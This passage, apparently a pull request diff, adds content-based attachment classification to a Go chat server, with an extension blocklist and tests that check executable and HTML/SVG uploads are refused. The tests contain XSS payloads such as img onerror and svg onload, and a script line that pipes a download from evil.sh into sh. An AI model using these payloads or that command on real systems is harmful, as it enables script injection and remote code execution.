### PR TITLE
feat(web-chat): Phase 1 half-built — mute, pinning, space ordering, attachment allow-list

### DIFF
--- a/docs-site/src/content/docs/reference/api.md
+++ b/docs-site/src/content/docs/reference/api.md
@@ -55,8 +55,11 @@ Uploads are accepted or refused **per file**, and the response reports both outc
 
 ```json
 {
-  "attachments": [{ "id": "…", "name": "compose.yaml", "mime": "text/plain", "size": 42, "url": "/api/v1/chat/attachments/…" }],
-  "failures":    [{ "name": "setup.sh", "error": "files with a .sh extension are not accepted" }]
+  "attachments": [{ "id": "…", "name": "compose.yaml", "mime": "text/plain", "size": 34, "url": "/api/v1/chat/attachments/…" }],
+  "failures": [
+    { "name": "setup.sh", "error": "dangerous file extension: .sh" },
+    { "name": "notes.html", "error": "files with a .html extension are not accepted" }
+  ]
 }
 ```
 

--- a/docs-site/src/content/docs/reference/api.md
+++ b/docs-site/src/content/docs/reference/api.md
@@ -47,6 +47,26 @@ Agent state uses a layered model:
 - `POST /join`: Complete the two-phase broker registration.
 - `GET /:id`: Get broker status and capacity.
 
+#### Chat Attachments (`/api/v1/chat/attachments`)
+- `POST /`: Upload one or more files (`multipart/form-data`, field `files`, optional `project_id`). Max 10 files, 10 MB each.
+- `GET /:id`: Download a stored attachment. Responses carry `X-Content-Type-Options: nosniff`, and `Content-Disposition: inline` only for image types — everything else is served as an `attachment`.
+
+Uploads are accepted or refused **per file**, and the response reports both outcomes:
+
+```json
+{
+  "attachments": [{ "id": "…", "name": "compose.yaml", "mime": "text/plain", "size": 42, "url": "/api/v1/chat/attachments/…" }],
+  "failures":    [{ "name": "setup.sh", "error": "files with a .sh extension are not accepted" }]
+}
+```
+
+Status codes:
+- `201 Created` — **at least one** file was stored. `failures` may be non-empty. Previously a single bad file failed the whole batch with `400` and stored nothing; clients that treat `201` as "all files stored" must now read `failures`, or they will drop files silently.
+- `400 Bad Request` — nothing was stored and the caller can fix it (blocked extension, unaccepted type, oversized file).
+- `500 Internal Server Error` — nothing was stored and the failure was server-side.
+
+The stored MIME type is derived from the file's content plus its extension; the `Content-Type` a client declares on the part is ignored. Executable extensions (`.exe`, `.sh`, `.js`, `.ps1`, and their peers) and markup extensions (`.html`, `.svg`, and their peers) are refused whatever the content is.
+
 #### Templates (`/api/v1/templates`)
 - `GET /`: List available agent templates.
 - `POST /`: Upload a new template or version.

--- a/docs-site/src/content/docs/reference/api.md
+++ b/docs-site/src/content/docs/reference/api.md
@@ -63,6 +63,8 @@ Uploads are accepted or refused **per file**, and the response reports both outc
 }
 ```
 
+`size` is the stored file's length in bytes — the example assumes a 34-byte `compose.yaml` — while `id` and `url` are elided here because both are assigned per upload.
+
 Status codes:
 - `201 Created` — **at least one** file was stored. `failures` may be non-empty. Previously a single bad file failed the whole batch with `400` and stored nothing; clients that treat `201` as "all files stored" must now read `failures`, or they will drop files silently.
 - `400 Bad Request` — nothing was stored and the caller can fix it (blocked extension, unaccepted type, oversized file).

--- a/pkg/hub/attachment_classify.go
+++ b/pkg/hub/attachment_classify.go
@@ -1,0 +1,110 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package hub
+
+import (
+	"fmt"
+	"net/http"
+	"path/filepath"
+	"strings"
+)
+
+// Attachment classification.
+//
+// The MIME type an upload is stored under is derived from the bytes plus the
+// filename, never from the type the client declares. A browser sends
+// application/octet-stream for anything it does not recognise — which is every
+// developer format worth attaching, config files and logs and source — so
+// trusting the declared type rejected exactly the files people wanted to send
+// (#1045). Trusting it in the other direction is worse: a declared type is a
+// claim the uploader controls, and an allowlist checked against a claim is not
+// an allowlist.
+
+// textLikeExtensions are the extensions accepted as plain text on the strength
+// of the extension, once the content has been confirmed to be text. They are
+// the developer formats a chat about software carries: config, data, logs,
+// source. Nothing here is executed or rendered by the browser — downloads go
+// out with nosniff and, for non-images, an attachment disposition.
+//
+// Deliberately absent: .js and every other entry of DangerousExtensions, and
+// .html, which the allowlist keeps out (see AllowedMimeTypes). .jsx is here
+// and .js is not, because the blocklist is about what a browser will run when
+// a file escapes the download path, and .jsx is not that file.
+var textLikeExtensions = map[string]bool{
+	".json": true, ".yaml": true, ".yml": true, ".toml": true,
+	".ini": true, ".cfg": true, ".env": true, ".log": true,
+	".csv": true, ".xml": true, ".diff": true, ".patch": true,
+	".txt": true, ".md": true, ".rst": true, ".adoc": true,
+	".sql": true, ".graphql": true, ".proto": true,
+	".ts": true, ".tsx": true, ".jsx": true, ".py": true,
+	".go": true, ".rs": true, ".rb": true, ".java": true,
+	".kt": true, ".swift": true, ".c": true, ".cpp": true,
+	".h": true, ".hpp": true, ".cs": true,
+}
+
+// contentSniffLen is how much of a file http.DetectContentType reads. Passing
+// more is harmless but pointless.
+const contentSniffLen = 512
+
+// ClassifyAttachment decides the MIME type an upload is stored under, from the
+// first bytes of its content and its filename. It returns an error describing
+// why a file is refused, phrased for the person who tried to send it.
+//
+// head may be shorter than contentSniffLen; an empty file classifies as text.
+func ClassifyAttachment(filename string, head []byte) (string, error) {
+	ext := strings.ToLower(filepath.Ext(filename))
+	if DangerousExtensions[ext] {
+		return "", fmt.Errorf("files with a %s extension are not accepted", ext)
+	}
+
+	if len(head) > contentSniffLen {
+		head = head[:contentSniffLen]
+	}
+	detected := http.DetectContentType(head)
+	if idx := strings.Index(detected, ";"); idx >= 0 {
+		detected = strings.TrimSpace(detected[:idx])
+	}
+
+	// A known text-like extension decides the stored type, but only once the
+	// bytes agree it is text: the extension is the uploader's word, and a
+	// binary payload wearing a .json name should not become an attachment the
+	// UI offers to preview as source.
+	if textLikeExtensions[ext] {
+		if !isTextContentType(detected) {
+			return "", fmt.Errorf("%s content does not look like text", ext)
+		}
+		if ext == ".md" {
+			return "text/markdown", nil
+		}
+		return "text/plain", nil
+	}
+
+	// Everything else is what the bytes say it is, checked against the
+	// allowlist. text/html and application/javascript are not on it, so a
+	// sniffed HTML or script body is refused here whatever it is called.
+	if AllowedMimeTypes[detected] {
+		return detected, nil
+	}
+	return "", fmt.Errorf("file type %q is not accepted", detected)
+}
+
+// isTextContentType reports whether a sniffed type means "these bytes are
+// text". http.DetectContentType answers text/plain for ordinary text and
+// text/html or text/xml when the content opens with markup — a Markdown file
+// starting with a tag, say. All of them are text; which of them a text-like
+// extension is stored as is decided by the extension, not by this.
+func isTextContentType(detected string) bool {
+	return strings.HasPrefix(detected, "text/")
+}

--- a/pkg/hub/attachment_classify.go
+++ b/pkg/hub/attachment_classify.go
@@ -17,7 +17,6 @@ package hub
 import (
 	"fmt"
 	"net/http"
-	"path/filepath"
 	"strings"
 )
 
@@ -39,9 +38,9 @@ import (
 // out with nosniff and, for non-images, an attachment disposition.
 //
 // Deliberately absent: .js and every other entry of DangerousExtensions, and
-// .html, which the allowlist keeps out (see AllowedMimeTypes). .jsx is here
-// and .js is not, because the blocklist is about what a browser will run when
-// a file escapes the download path, and .jsx is not that file.
+// the markup extensions of refusedMarkupExtensions. .jsx is here and .js is
+// not, because the blocklist is about what a browser will run when a file
+// escapes the download path, and .jsx is not that file.
 var textLikeExtensions = map[string]bool{
 	".json": true, ".yaml": true, ".yml": true, ".toml": true,
 	".ini": true, ".cfg": true, ".env": true, ".log": true,
@@ -54,6 +53,31 @@ var textLikeExtensions = map[string]bool{
 	".h": true, ".hpp": true, ".cs": true,
 }
 
+// refusedMarkupExtensions are refused on the extension alone, whatever their
+// bytes sniff as.
+//
+// The allowlist keeps out the sniffed type text/html. It does not keep out
+// .html files: http.DetectContentType answers text/html for seventeen fixed tag
+// signatures, and <img>, <svg> and <video> are not among them, so a document
+// built from those sniffs as text/plain. Before this check, an .html file
+// containing <img src=x onerror=…> was accepted and stored as text — inert,
+// because the download path sends nosniff and an attachment disposition and the
+// preview goes to a text sink, but inert only for as long as all three of those
+// hold at once.
+//
+// None of these is in textLikeExtensions, so refusing them removes nothing the
+// change set out to accept; and main already refused them in practice, since a
+// browser declares text/html or image/svg+xml for these files and the old gate
+// checked that declaration against the same allowlist. This restores that
+// parity rather than tightening past it.
+//
+// .hta is not here: it is in DangerousExtensions, with the executables it
+// belongs to.
+var refusedMarkupExtensions = map[string]bool{
+	".html": true, ".htm": true, ".xhtml": true, ".shtml": true,
+	".mhtml": true, ".mht": true, ".svg": true,
+}
+
 // contentSniffLen is how much of a file http.DetectContentType reads. Passing
 // more is harmless but pointless.
 const contentSniffLen = 512
@@ -64,8 +88,8 @@ const contentSniffLen = 512
 //
 // head may be shorter than contentSniffLen; an empty file classifies as text.
 func ClassifyAttachment(filename string, head []byte) (string, error) {
-	ext := strings.ToLower(filepath.Ext(filename))
-	if DangerousExtensions[ext] {
+	ext := attachmentExt(filename)
+	if DangerousExtensions[ext] || refusedMarkupExtensions[ext] {
 		return "", fmt.Errorf("files with a %s extension are not accepted", ext)
 	}
 
@@ -93,7 +117,9 @@ func ClassifyAttachment(filename string, head []byte) (string, error) {
 
 	// Everything else is what the bytes say it is, checked against the
 	// allowlist. text/html and application/javascript are not on it, so a
-	// sniffed HTML or script body is refused here whatever it is called.
+	// sniffed HTML or script body is refused here whatever it is called — which
+	// is the other half of the markup rule above: the extension check catches
+	// the payloads the sniff misses, the sniff catches the ones renamed .txt.
 	if AllowedMimeTypes[detected] {
 		return detected, nil
 	}

--- a/pkg/hub/attachment_classify.go
+++ b/pkg/hub/attachment_classify.go
@@ -73,6 +73,11 @@ var textLikeExtensions = map[string]bool{
 //
 // .hta is not here: it is in DangerousExtensions, with the executables it
 // belongs to.
+//
+// Enforced in SanitizeFilename as well as here, so the agent --attach path
+// refuses these too — it never calls ClassifyAttachment. The check stays in
+// both places because ClassifyAttachment is also usable on its own, and the
+// two maps should not disagree about which files exist.
 var refusedMarkupExtensions = map[string]bool{
 	".html": true, ".htm": true, ".xhtml": true, ".shtml": true,
 	".mhtml": true, ".mht": true, ".svg": true,

--- a/pkg/hub/attachment_classify_test.go
+++ b/pkg/hub/attachment_classify_test.go
@@ -18,11 +18,14 @@ package hub
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
+	"io/fs"
 	"mime/multipart"
 	"net/http"
 	"net/http/httptest"
+	"path/filepath"
 	"strings"
 	"testing"
 )
@@ -485,6 +488,87 @@ func TestAttachmentDownload_SetsNosniffAndDisposition(t *testing.T) {
 		wantCD := expected.disposition + `; filename="` + att.Name + `"`
 		if h := got.Header().Get("Content-Disposition"); h != wantCD {
 			t.Errorf("%s: Content-Disposition = %q, want %q", att.Name, h, wantCD)
+		}
+	}
+}
+
+// ---------------------------------------------------------------------------
+// Orphan blobs (#1089)
+// ---------------------------------------------------------------------------
+
+// createAttachmentFailingStore fails the metadata write for named files and
+// passes everything else through, which is the shape of the real failure: the
+// blob is already saved when the DB call comes back with an error.
+type createAttachmentFailingStore struct {
+	WebChatStore
+	failNames map[string]bool
+}
+
+func (s createAttachmentFailingStore) CreateAttachment(ctx context.Context, meta AttachmentMeta) error {
+	if s.failNames[meta.Filename] {
+		return fmt.Errorf("injected metadata failure")
+	}
+	return s.WebChatStore.CreateAttachment(ctx, meta)
+}
+
+func countStoredBlobs(t *testing.T, dir string) []string {
+	t.Helper()
+	var names []string
+	err := filepath.WalkDir(dir, func(path string, d fs.DirEntry, err error) error {
+		if err != nil {
+			return err
+		}
+		if !d.IsDir() {
+			names = append(names, d.Name())
+		}
+		return nil
+	})
+	if err != nil {
+		t.Fatalf("walk %s: %v", dir, err)
+	}
+	return names
+}
+
+// A blob whose metadata write failed is unreachable: the download path finds
+// attachments through the row that was never written. It used to stay on disk
+// for good, one per request; the per-file loop would have made it ten.
+func TestAttachmentUpload_MetadataFailureLeavesNoOrphanBlob(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	dir := t.TempDir()
+	as, err := NewLocalDiskAttachmentStore(dir)
+	if err != nil {
+		t.Fatalf("NewLocalDiskAttachmentStore: %v", err)
+	}
+	srv.SetAttachmentStore(as)
+	srv.SetWebChatStore(createAttachmentFailingStore{
+		WebChatStore: srv.webChatStore,
+		failNames:    map[string]bool{"boom.log": true},
+	})
+
+	rec := uploadAttachments(t, srv, []uploadFile{
+		{name: "first.log", mime: "application/octet-stream", content: "one\n"},
+		{name: "boom.log", mime: "application/octet-stream", content: "two\n"},
+		{name: "third.log", mime: "application/octet-stream", content: "three\n"},
+	})
+	if rec.Code != http.StatusCreated {
+		t.Fatalf("expected 201, got %d: %s", rec.Code, rec.Body.String())
+	}
+	resp := decodeUploadResponse(t, rec)
+	if len(resp.Attachments) != 2 {
+		t.Fatalf("stored %d files, want 2 (the rest of the batch survives): %s", len(resp.Attachments), rec.Body.String())
+	}
+	if len(resp.Failures) != 1 || resp.Failures[0].Name != "boom.log" {
+		t.Fatalf("failures = %+v, want one entry for boom.log", resp.Failures)
+	}
+
+	blobs := countStoredBlobs(t, dir)
+	if len(blobs) != 2 {
+		t.Fatalf("on disk: %v, want exactly the two files that got a row", blobs)
+	}
+	for _, name := range blobs {
+		if name == "boom.log" {
+			t.Errorf("boom.log is still on disk with no row to reach it")
 		}
 	}
 }

--- a/pkg/hub/attachment_classify_test.go
+++ b/pkg/hub/attachment_classify_test.go
@@ -122,6 +122,76 @@ func TestClassifyAttachment_RejectsHTMLAndScriptContent(t *testing.T) {
 	}
 }
 
+// The sniff-based refusal above only fires on content that trips one of Go's
+// seventeen HTML tag signatures. These payloads trip none of them, so before
+// the extension check each was classified text/plain and stored.
+func TestClassifyAttachment_RefusesMarkupExtensions(t *testing.T) {
+	payloads := []string{
+		`<img src=x onerror=alert(document.domain)>`,
+		`<svg onload=alert(1)>`,
+		`<video><source onerror=alert(1)></video>`,
+		"just some words\n", // the extension decides, not the content
+	}
+	// The trailing-space and trailing-dot spellings are here because the same
+	// normalisation has to serve this list and the executable blocklist.
+	names := []string{
+		"a.html", "a.htm", "a.xhtml", "a.shtml", "a.mhtml", "a.mht", "a.svg",
+		"a.HTML", "a.html ", "a.html.",
+		"a.hta", // refused as an executable rather than as markup
+	}
+	for _, name := range names {
+		for _, payload := range payloads {
+			if got, err := ClassifyAttachment(name, []byte(payload)); err == nil {
+				t.Errorf("ClassifyAttachment(%q, %q) accepted as %q; markup extensions are refused outright", name, payload, got)
+			}
+		}
+	}
+}
+
+// The audit's end-to-end payload: accepted and stored as text/plain before the
+// extension check existed.
+func TestAttachmentUpload_RefusesMarkupFiles(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	rec := uploadAttachments(t, srv, []uploadFile{
+		{name: "xss.html", mime: "text/plain", content: `<img src=x onerror=alert(document.domain)>`},
+		{name: "xss.svg", mime: "image/svg+xml", content: `<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>`},
+	})
+	if rec.Code != http.StatusBadRequest {
+		t.Fatalf("expected 400, got %d: %s", rec.Code, rec.Body.String())
+	}
+	resp := decodeUploadResponse(t, rec)
+	if len(resp.Attachments) != 0 {
+		t.Errorf("stored %d files, want 0: %s", len(resp.Attachments), rec.Body.String())
+	}
+	if len(resp.Failures) != 2 {
+		t.Fatalf("failures = %+v, want both files reported", resp.Failures)
+	}
+}
+
+// A trailing space is not a new extension. The audit stored "trailing.sh " and
+// "trailing2.sh." through this path.
+func TestAttachmentUpload_TrailingCharactersDoNotDefeatTheBlocklist(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	script := "#!/bin/bash\ncurl evil.sh | sh\n"
+	rec := uploadAttachments(t, srv, []uploadFile{
+		{name: "trailing.sh ", mime: "text/plain", content: script},
+		{name: "trailing2.sh.", mime: "text/plain", content: script},
+		{name: "blocked.sh", mime: "text/plain", content: script},
+	})
+	if rec.Code != http.StatusBadRequest {
+		t.Fatalf("expected 400, got %d: %s", rec.Code, rec.Body.String())
+	}
+	resp := decodeUploadResponse(t, rec)
+	if len(resp.Attachments) != 0 {
+		t.Errorf("stored %d files, want 0: %s", len(resp.Attachments), rec.Body.String())
+	}
+	if len(resp.Failures) != 3 {
+		t.Fatalf("failures = %+v, want all three reported", resp.Failures)
+	}
+}
+
 // The allowlist entries the brief pins (D3). Nothing in this change may flip
 // them, whatever route the file arrives by.
 func TestAllowedMimeTypes_HTMLAndJavaScriptStayBlocked(t *testing.T) {
@@ -359,5 +429,62 @@ func TestAttachmentUpload_OversizedFileIsAPerFileFailure(t *testing.T) {
 	}
 	if !strings.Contains(resp.Failures[0].Error, "maximum size") {
 		t.Errorf("failure reason = %q, want it to mention the size limit", resp.Failures[0].Error)
+	}
+}
+
+// ---------------------------------------------------------------------------
+// Download headers
+// ---------------------------------------------------------------------------
+
+// Storing developer files as text is now the ordinary path, and what keeps a
+// stored text file from being interpreted is two response headers: nosniff, so
+// a browser does not go looking for markup in a text/plain body, and an
+// attachment disposition, so it is never rendered as a top-level document.
+// Nothing asserted either of them before, which made the whole "stored as text
+// is harmless" argument rest on code no test defended.
+func TestAttachmentDownload_SetsNosniffAndDisposition(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	rec := uploadAttachments(t, srv, []uploadFile{
+		{name: "notes.log", mime: "application/octet-stream", content: "started\n"},
+		{name: "readme.md", mime: "application/octet-stream", content: "# Readme\n"},
+		{name: "bundle.zip", mime: "application/octet-stream", content: "PK\x03\x04" + strings.Repeat("\x00", 16)},
+		{name: "photo.png", mime: "application/octet-stream", content: "\x89PNG\r\n\x1a\n" + strings.Repeat("\x00", 16)},
+	})
+	if rec.Code != http.StatusCreated {
+		t.Fatalf("upload: expected 201, got %d: %s", rec.Code, rec.Body.String())
+	}
+	resp := decodeUploadResponse(t, rec)
+	if len(resp.Attachments) != 4 {
+		t.Fatalf("stored %d files, want 4: %s", len(resp.Attachments), rec.Body.String())
+	}
+
+	want := map[string]struct{ mime, disposition string }{
+		"notes.log":  {"text/plain", "attachment"},
+		"readme.md":  {"text/markdown", "attachment"},
+		"bundle.zip": {"application/zip", "attachment"},
+		// The one type that is served for the browser to render, and the only
+		// one that may be.
+		"photo.png": {"image/png", "inline"},
+	}
+	for _, att := range resp.Attachments {
+		expected, ok := want[att.Name]
+		if !ok {
+			t.Fatalf("unexpected attachment %q", att.Name)
+		}
+		got := doRequest(t, srv, http.MethodGet, att.URL, nil)
+		if got.Code != http.StatusOK {
+			t.Fatalf("GET %s: expected 200, got %d: %s", att.URL, got.Code, got.Body.String())
+		}
+		if h := got.Header().Get("X-Content-Type-Options"); h != "nosniff" {
+			t.Errorf("%s: X-Content-Type-Options = %q, want nosniff", att.Name, h)
+		}
+		if h := got.Header().Get("Content-Type"); h != expected.mime {
+			t.Errorf("%s: Content-Type = %q, want %q", att.Name, h, expected.mime)
+		}
+		wantCD := expected.disposition + `; filename="` + att.Name + `"`
+		if h := got.Header().Get("Content-Disposition"); h != wantCD {
+			t.Errorf("%s: Content-Disposition = %q, want %q", att.Name, h, wantCD)
+		}
 	}
 }

--- a/pkg/hub/attachment_classify_test.go
+++ b/pkg/hub/attachment_classify_test.go
@@ -413,6 +413,41 @@ func TestAttachmentUpload_AllFilesRejected(t *testing.T) {
 	}
 }
 
+// The composer prints the filename and this string side by side, so the string
+// has to be one reason and not a stack of subjects. Moving the extension
+// refusal into SanitizeFilename put it behind the upload path's wrapper, which
+// produced "invalid filename: files with a .html extension are not accepted"
+// and, for a dot-only name, "invalid filename: invalid filename" (#1045).
+//
+// Exact strings, not substrings: this is the whole of what the user is told.
+func TestAttachmentUpload_FailureMessageIsASingleReason(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	cases := []struct {
+		file uploadFile
+		want string
+	}{
+		{uploadFile{name: "evil.html", mime: "text/plain", content: "<img src=x onerror=alert(1)>"},
+			"files with a .html extension are not accepted"},
+		{uploadFile{name: "diagram.svg", mime: "image/svg+xml", content: "<svg/>"},
+			"files with a .svg extension are not accepted"},
+		{uploadFile{name: "bad.exe", mime: "application/octet-stream", content: "MZ binary"},
+			"dangerous file extension: .exe"},
+		{uploadFile{name: "..", mime: "text/plain", content: "hi"},
+			"invalid filename"},
+	}
+	for _, tc := range cases {
+		rec := uploadAttachments(t, srv, []uploadFile{tc.file})
+		resp := decodeUploadResponse(t, rec)
+		if len(resp.Failures) != 1 {
+			t.Fatalf("%q: failures = %+v, want exactly one", tc.file.name, resp.Failures)
+		}
+		if resp.Failures[0].Error != tc.want {
+			t.Errorf("%q: failure text = %q, want %q", tc.file.name, resp.Failures[0].Error, tc.want)
+		}
+	}
+}
+
 func TestAttachmentUpload_OversizedFileIsAPerFileFailure(t *testing.T) {
 	srv, _ := attachmentTestServer(t)
 

--- a/pkg/hub/attachment_classify_test.go
+++ b/pkg/hub/attachment_classify_test.go
@@ -1,0 +1,363 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+//go:build !no_sqlite
+
+package hub
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"mime/multipart"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+)
+
+// Classification decides what an upload is stored as, from its bytes and its
+// name. The tests below hold three lines at once: the developer formats #1045
+// is about are accepted, the blocked extensions stay blocked however the
+// content is dressed up, and a claimed Content-Type buys nothing.
+
+func TestClassifyAttachment_TextLikeExtensions(t *testing.T) {
+	// Every extension the brief lists as accept-as-text (D4). Each is stored
+	// as text, so the composer's preview and the download path treat them all
+	// the same way.
+	extensions := []string{
+		".json", ".yaml", ".yml", ".toml", ".ini", ".cfg", ".env", ".log",
+		".csv", ".xml", ".diff", ".patch", ".txt", ".md", ".rst", ".adoc",
+		".sql", ".graphql", ".proto", ".ts", ".tsx", ".jsx", ".py", ".go",
+		".rs", ".rb", ".java", ".kt", ".swift", ".c", ".cpp", ".h", ".hpp",
+		".cs",
+	}
+	for _, ext := range extensions {
+		t.Run(ext, func(t *testing.T) {
+			got, err := ClassifyAttachment("notes"+ext, []byte("some plain content\n"))
+			if err != nil {
+				t.Fatalf("ClassifyAttachment(%q) error: %v", ext, err)
+			}
+			want := "text/plain"
+			if ext == ".md" {
+				want = "text/markdown"
+			}
+			if got != want {
+				t.Errorf("ClassifyAttachment(%q) = %q, want %q", ext, got, want)
+			}
+			if !AllowedMimeTypes[got] {
+				t.Errorf("%q classified as %q, which the allowlist rejects", ext, got)
+			}
+		})
+	}
+}
+
+// A dotfile is all extension. .env is the one people actually attach.
+func TestClassifyAttachment_BareDotfile(t *testing.T) {
+	got, err := ClassifyAttachment(".env", []byte("API_KEY=redacted\n"))
+	if err != nil {
+		t.Fatalf("ClassifyAttachment(.env) error: %v", err)
+	}
+	if got != "text/plain" {
+		t.Errorf("ClassifyAttachment(.env) = %q, want text/plain", got)
+	}
+}
+
+func TestClassifyAttachment_RejectsDangerousExtensions(t *testing.T) {
+	// Every blocked extension, offered with innocent text content — the shape
+	// of an attempt to sneak one through. None may be accepted (D2).
+	for ext := range DangerousExtensions {
+		t.Run(ext, func(t *testing.T) {
+			if _, err := ClassifyAttachment("payload"+ext, []byte("echo hello\n")); err == nil {
+				t.Errorf("ClassifyAttachment(%q) was accepted; blocked extensions must stay blocked", ext)
+			}
+		})
+	}
+}
+
+// .js is blocked and .jsx is not: the blocklist is about what a browser will
+// run, and the pair is the easiest place for that distinction to be lost.
+func TestClassifyAttachment_JSBlockedJSXAccepted(t *testing.T) {
+	if _, err := ClassifyAttachment("app.js", []byte("export const x = 1;\n")); err == nil {
+		t.Error("app.js was accepted; .js must stay blocked")
+	}
+	got, err := ClassifyAttachment("app.jsx", []byte("export const x = <div />;\n"))
+	if err != nil {
+		t.Fatalf("app.jsx rejected: %v", err)
+	}
+	if got != "text/plain" {
+		t.Errorf("app.jsx = %q, want text/plain", got)
+	}
+}
+
+func TestClassifyAttachment_RejectsHTMLAndScriptContent(t *testing.T) {
+	// Sniffed HTML has no accepted extension to hide behind, and the allowlist
+	// keeps text/html and application/javascript out (D3).
+	tests := []struct {
+		name    string
+		content string
+	}{
+		{"page.html", "<!DOCTYPE html><html><body>hi</body></html>"},
+		{"page.htm", "<html><head></head><body>hi</body></html>"},
+		{"widget.svg", `<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"></svg>`},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got, err := ClassifyAttachment(tt.name, []byte(tt.content))
+			if err == nil {
+				t.Errorf("%s accepted as %q; markup must not be stored under an executable-in-a-browser type", tt.name, got)
+			}
+		})
+	}
+}
+
+// The allowlist entries the brief pins (D3). Nothing in this change may flip
+// them, whatever route the file arrives by.
+func TestAllowedMimeTypes_HTMLAndJavaScriptStayBlocked(t *testing.T) {
+	if AllowedMimeTypes["text/html"] {
+		t.Error("AllowedMimeTypes[text/html] is true")
+	}
+	if AllowedMimeTypes["application/javascript"] {
+		t.Error("AllowedMimeTypes[application/javascript] is true")
+	}
+}
+
+func TestClassifyAttachment_BinaryContentUnderTextName(t *testing.T) {
+	// A PNG called config.json is not a config file. Storing it as text/plain
+	// on the strength of the name would be the extension telling the lie the
+	// content check exists to catch.
+	png := []byte{0x89, 'P', 'N', 'G', 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 0}
+	if got, err := ClassifyAttachment("config.json", png); err == nil {
+		t.Errorf("binary content under a .json name accepted as %q", got)
+	}
+}
+
+func TestClassifyAttachment_DetectsRealTypes(t *testing.T) {
+	tests := []struct {
+		name    string
+		content []byte
+		want    string
+	}{
+		{"photo.png", []byte("\x89PNG\r\n\x1a\n" + strings.Repeat("\x00", 16)), "image/png"},
+		{"photo.jpg", []byte("\xff\xd8\xff\xe0" + strings.Repeat("\x00", 16)), "image/jpeg"},
+		{"paper.pdf", []byte("%PDF-1.7\n" + strings.Repeat("x", 16)), "application/pdf"},
+		{"bundle.zip", append([]byte("PK\x03\x04"), bytes.Repeat([]byte{0}, 16)...), "application/zip"},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got, err := ClassifyAttachment(tt.name, tt.content)
+			if err != nil {
+				t.Fatalf("ClassifyAttachment(%q) error: %v", tt.name, err)
+			}
+			if got != tt.want {
+				t.Errorf("ClassifyAttachment(%q) = %q, want %q", tt.name, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestClassifyAttachment_EmptyFileIsText(t *testing.T) {
+	got, err := ClassifyAttachment("empty.log", nil)
+	if err != nil {
+		t.Fatalf("empty file rejected: %v", err)
+	}
+	if got != "text/plain" {
+		t.Errorf("empty.log = %q, want text/plain", got)
+	}
+}
+
+// ---------------------------------------------------------------------------
+// Upload handler: classification and per-file results
+// ---------------------------------------------------------------------------
+
+type uploadFile struct {
+	name    string
+	mime    string // the Content-Type the client claims
+	content string
+}
+
+// uploadAttachments posts a batch of files to the upload endpoint.
+func uploadAttachments(t *testing.T, srv *Server, files []uploadFile) *httptest.ResponseRecorder {
+	t.Helper()
+
+	var body bytes.Buffer
+	mw := multipart.NewWriter(&body)
+	for _, f := range files {
+		h := make(map[string][]string)
+		h["Content-Disposition"] = []string{
+			fmt.Sprintf(`form-data; name="files"; filename=%q`, f.name),
+		}
+		h["Content-Type"] = []string{f.mime}
+		part, err := mw.CreatePart(h)
+		if err != nil {
+			t.Fatalf("CreatePart: %v", err)
+		}
+		if _, err := part.Write([]byte(f.content)); err != nil {
+			t.Fatalf("write part: %v", err)
+		}
+	}
+	if err := mw.Close(); err != nil {
+		t.Fatalf("close writer: %v", err)
+	}
+
+	req := httptest.NewRequest(http.MethodPost, "/api/v1/chat/attachments", &body)
+	req.Header.Set("Content-Type", mw.FormDataContentType())
+	req.Header.Set("Authorization", "Bearer "+testDevToken)
+
+	rec := httptest.NewRecorder()
+	srv.Handler().ServeHTTP(rec, req)
+	return rec
+}
+
+type uploadResponse struct {
+	Attachments []attachmentUploadResult  `json:"attachments"`
+	Failures    []attachmentUploadFailure `json:"failures"`
+}
+
+func decodeUploadResponse(t *testing.T, rec *httptest.ResponseRecorder) uploadResponse {
+	t.Helper()
+	var resp uploadResponse
+	if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
+		t.Fatalf("decode: %v", err)
+	}
+	return resp
+}
+
+func TestAttachmentUpload_StoresDeveloperFilesAsText(t *testing.T) {
+	srv, _ := attachmentTestServer(t)
+
+	// The browser sends application/octet-stream for formats it does not
+	// recognise. Before #1045 that alone rejected the file.
+	rec := uploadAttachments(t, srv, []uploadFile{
+		{name: "compose.yaml", mime: "application/octet-stream", content: "services:\n  hub: {}\n"},
+		{name: "main.go", mime: "", content: "package main\n"},
+		{name: "notes.md", mime: "application/octet-stream", content: "# Notes\n"},
+	})
+	if rec.Code != http.StatusCreated {
+		t.Fatalf("expected 201, got %d: %s", rec.Code, rec.Body.String())
+	}
+
+	resp := decodeUploadResponse(t, rec)
+	if len(resp.Attachments) != 3 || len(resp.Failures) != 0 {
+		t.Fatalf("got %d stored / %d failed, want 3 / 0: %s", len(resp.Attachments), len(resp.Failures), rec.Body.String())
+	}
+	want := map[string]string{
+		"compose.yaml": "text/plain",
+		"main.go":      "text/plain",
+		"notes.md":     "text/markdown",
+	}
+	for _, att := range resp.Attachments {
+		if want[att.Name] != att.MimeType {
